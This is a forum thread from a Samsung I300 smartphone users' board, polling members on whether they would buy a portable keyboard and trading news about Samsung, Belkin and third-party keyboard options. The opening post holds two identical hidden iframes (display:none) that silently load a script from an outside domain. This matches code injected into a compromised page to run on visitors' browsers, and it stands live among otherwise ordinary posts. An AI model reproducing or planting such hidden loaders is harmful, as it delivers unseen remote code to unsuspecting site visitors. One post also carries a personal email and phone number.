Poll: Would you buy a portable keyboard for your I300 if one was available?

+ Reply to Thread
Page 1 of 2 1 2 LastLast

Question Would you buy a portable keyboard for your I300 if one was available?

Would you buy a portable keyboard for your I300 if one was available?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I spoke to a samsung tech a number of times
    in November who told me they were expecting
    a shipment of accessories by years end.
    According to him, this shipment was to include
    accessories. Emaile him a couple of days ago
    and haven't heard back yet.

Administrator

Arrow

out of all the acessories for the '300, i would get a keyboard first!

why? just to have one.... to be able to chat with someone online without having to take all day to draw out the letters...

Just received response from tight lipped Samsung who told me they still have no date available, but were pushing for the end of the year. I doubt it.

Administrator

Arrow

...me too...

but atleast you are looking out for us!

How many people would buy either of the two following external keyboard solutions?

1.) A RIM "thumb board" device bundled with ICQ software.

2.) A Palm OS software driver and adapter that would allow you
    plug ANY regular PS/2 connector keyboard into the SPH-I300's (or any other Palm OS device's) serial cradle connector.

Please reply, your posts may have an impact on whether either of the two products above see the light of day....

I may be inclined to purchase the latter of the two. At this point, however, I probably will stick it out until Samsung releases their keyboard. The company needs to give us a little more insight regarding the post release I300 products. If someone does produce an alternative to waiting for Samsungs keyboard, that we're not even sure is coming, why not purchase. Samsung loses another dollar.

someone at work has a seiko pad writer/keyboad device that communicates with any palm device using an IR connection..... you still have to use "their" pen to use the larger keyboard..... it works, but not something I would buy as you have to have your device velcro'd in the case so the IR beamer/receiver's can communicate....

A thumboard, or something similar to the palm branded portable keyboards would be great....

Brooks

Keyboard and SPRINT

I would THINK that Sprint would want a keyboard released. It would INCREASE the usage of their network. It would most likely also cause many many people to go over there minutes which would in turn be a very profitable revenue stream for Sprint.

Talking

At Comdex 2001 I talked with the rep from Belkin and they said they were releasing both a clip on and a full size collapsable keyboard late Q1 of 02
    Jeff Werner
    Body Works Studio
    bodyworks@bigvaluezone.com
    http://www.bigvaluezone.com/bodyworks
    Phone - 781-367-6081

GREAT NEWS

Jeff,
    That is the best news I have heard all week. Can't wait for Belkin to release the keyboards.

Having a conduit that allowed i300 users to connect to the 100's of 3rd party hardware add-ons for the palm would be the best option. Although we should expect some to come out directoly for the i300, I don't expect anyone to come out with a digital camera or GPS unit.

Just got a note from Samsung stating that their keyboard should not hit the market until, at least, the second quarter.

Administrator

Arrow

thats still some good news to hear...

the kyo geeks has not released a keyboard (to date) for the 6035 and never said they would... atleast samsung seems to be listening..

YES!

I'd like one of two kinds of keyboards.

1) A foldup one.

2) An adaptor for the PS/2 keyboard, but I don't want to have to use a cradle. I just want an adaptor (the current cradle is way too big!). The adaptor could have a little colapsable stand but it's gotta be small. I could keep the adaptor with me (even travel) and always borrow a keyboard or throw an old one in my luggage and not even bring it back from my trip! A stand with an infrared adaptor seems like a good marking item, it would work with all palms...

Gary

widow's son

Keyboard for my i300? Not a Chance!

I wouldn't buy one of these, just like I never bought one for my Visor (now rusting quietly away in the closet).

Using a keyboard with a Palm device is like having a half-ton hardtop permanently installed on your V-8 convertible. What's the point?

Sean

Administrator

Arrow

the point is to be totaly disconnected from the DESKTOP. with a GOOD keyboard and a GREAT driver, there would be no need for you to have to lug the laptop around... totally wireless... all the time!!!! ahhhh sounds good to me!!!

V-8? come on now.... real cars come with a V-10....

Brooks

widow's son

V-8 vs. V-10

I'm glad to have the room to use my i300 in my GT, instead of struggling for space to move about in your Viper...

It wasn't dangerous enough chatting on the phone before, no, I had to get a palm-phone. And with a stick shift, I may top last year's record of two accidents!

I don't know. I have never been impressed with any of the Palm Keyboard solutions I have ever seen. The I300 is already teetering dangerously close to maximum capacity of what I would carry around with me. Add a keyboard, and it would tilt the scales.

That said, it would be nice if Samsung did one of two things for the next gen smartphone:

A) have an option for a builtin keyboard, like the Handspring Treo will.
    B) use the soft grafitti area to have a soft keyboard as an option. This way the on screen keyboard wouldn't take up any application screen real estate. Why Samsung or Handera didn't think this one through is beyond me.

I am all for keyboards, but I hate kludges.